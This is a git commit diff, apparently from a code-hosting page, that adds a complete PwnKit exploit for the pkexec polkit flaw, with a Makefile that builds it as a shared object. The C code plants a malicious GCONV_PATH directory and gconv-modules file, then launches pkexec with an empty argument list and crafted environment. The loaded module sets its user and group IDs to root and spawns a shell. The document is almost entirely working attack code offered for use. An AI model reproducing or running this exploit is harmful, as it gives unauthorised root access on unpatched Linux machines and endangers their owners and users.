Init
commit
2bc2c0d48a
@ -0,0 +1 @@
|
||||
out
|
@ -0,0 +1,13 @@
|
||||
VERSION = "\"0.3.2\\n© Ruthenic, 2021\""
|
||||
|
||||
CC ?= gcc
|
||||
target ?= $(shell ${CC} -dumpmachine)
|
||||
CC_FLAGS ?=
|
||||
|
||||
.PHONY: all debug
|
||||
all:
|
||||
gcc -shared src/exploit.c -o out/pwnkit.so -Wl,-soname,libservice.so -Wl,-e,main -fPIC
|
||||
|
||||
debug: CC_FLAGS:=-g -O0 -v ${CC_FLAGS}
|
||||
debug: all
|
||||
|
@ -0,0 +1,79 @@
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <unistd.h>
|
||||
|
||||
#include <sys/stat.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/wait.h>
|
||||
|
||||
const char service_interp[] __attribute__((section(".interp"))) = "/lib64/ld-linux-x86-64.so.2"; //jank to get this working
|
||||
|
||||
void print(const char string[]) {
|
||||
fwrite(string, sizeof(char), strlen(string) + 1, stdout);
|
||||
fwrite("\n", sizeof(char), strlen("\n"), stdout);
|
||||
}
|
||||
|
||||
void gconv() {} //gconv thing
|
||||
|
||||
void gconv_init() {
|
||||
print("pwned lol !");
|
||||
setuid(0);
|
||||
seteuid(0);
|
||||
setgid(0);
|
||||
setegid(0);
|
||||
char *shellArgv[] = {"sh", NULL};
|
||||
execv("/bin/sh", shellArgv);
|
||||
}
|
||||
|
||||
void setup(char *argv[]) {
|
||||
mkdir("GCONV_PATH=.", S_IRWXU | S_IRWXG | S_IROTH | S_IXOTH);
|
||||
mkdir("pwn", S_IRWXU | S_IRWXG | S_IROTH | S_IXOTH);
|
||||
FILE *fp = fopen("GCONV_PATH=./pwn", "w");
|
||||
struct stat buf;
|
||||
fstat(fileno(fp), &buf);
|
||||
fchmod(fileno(fp), buf.st_mode | S_IXUSR | S_IXGRP | S_IXOTH );
|
||||
fclose(fp);
|
||||
system("/bin/cp pwnkit.so pwn/pwnkit.so"); //i cant be fucked
|
||||
fp = fopen("pwn/gconv-modules", "w");
|
||||
char *gconv = "module PWNKIT// INTERNAL pwnkit 2\n"
|
||||
"module INTERNAL PWNKIT// pwnkit 2";
|
||||
fputs(gconv, fp);
|
||||
fclose(fp);
|
||||
}
|
||||
|
||||
void clean() {
|
||||
remove("GCONV_PATH=./pwn");
|
||||
rmdir("GCONV_PATH=.");
|
||||
remove("pwn/pwnkit.so");
|
||||
remove("pwn/gconv-modules");
|
||||
rmdir("pwn");
|
||||
}
|
||||
|
||||
void runAndClean(const char *env[], const char *arg[]) {
|
||||
int pid = fork();
|
||||
if (pid == 0) execve("/usr/bin/pkexec", arg, env);
|
||||
else {
|
||||
waitpid(pid, NULL, 0);
|
||||
print("[Pwnkit] Cleaning up..");
|
||||
clean();
|
||||
}
|
||||
}
|
||||
|
||||
int main(int argc, char *argv[]) {
|
||||
print("[Pwnkit] Setting up directory structure..");
|
||||
setup(argv);
|
||||
print("[Pwnkit] Setting up environment variables..");
|
||||
const char *env[] = {
|
||||
"pwn",
|
||||
"PATH=GCONV_PATH=.",
|
||||
"CHARSET=pwnkit",
|
||||
"SHELL=pwn",
|
||||
"GIO_USE_VFS=",
|
||||
NULL
|
||||
};
|
||||
const char *args[] = { NULL };
|
||||
print("[Pwnkit] Pwning pkexec..");
|
||||
runAndClean(env, args);
|
||||
_exit(0);
|
||||
}
|
@ -0,0 +1,7 @@
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
|
||||
int main(void) {
|
||||
putenv("GCONV_PATH=.");
|
||||
FILE *fp = fopen("exploit.c", "r,ccs=pwnkit");
|
||||
}
|
Loading…
Reference in new issue